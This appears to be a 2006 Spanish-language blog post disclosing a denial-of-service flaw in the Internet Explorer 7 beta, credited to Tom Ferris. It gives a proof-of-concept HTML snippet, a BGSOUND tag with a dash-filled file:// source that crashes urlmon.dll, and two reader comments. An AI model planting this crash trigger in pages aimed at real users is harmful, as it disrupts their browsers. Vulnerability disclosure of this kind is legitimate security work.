ecoestadistica.com

jueves, febrero 02, 2006

Primera Vulnerabilidad para el BETA de IE7...

Version Afectada:
Internet Explorer 7,0 2 Beta (7,0,5296,0)

Descripcion:
Una vulnerabilidad del tipo DOS (denegacion de servicio), existe dentro del Internet Explorer beta 7.0.2 que causa que el navegador se ¨cuelgue¨ y eventualmente ejecutar codigo malicioso en el sistema de la victima.

Detalles:
Al ejecutarse un archivo HTML especialmente creado,urlmon.dll no analiza correctamente el 'BGSOUND SRC=file://---' (aprox.344 dashes), produciendo el desplome del navegador.

Prueba de Concepto:
El siguiente codigo html produce el ¨cuelgue¨:

BGSOUND
SRC=file://---------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
---------------------------------- >

PRUEBA

descubierto por Tom Ferris.

Salu2

2 Comments:

Blogger Alvaro Paz said...

Un blog muy interesante.Te voi añadir a la lista de links de mi modesto blog. Un saludo

febrero 07, 2006 2:37 p. m.  
Anonymous alguienn said...

idolo.
sigo esperando algun nuevo post!

febrero 07, 2006 4:31 p. m.  

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com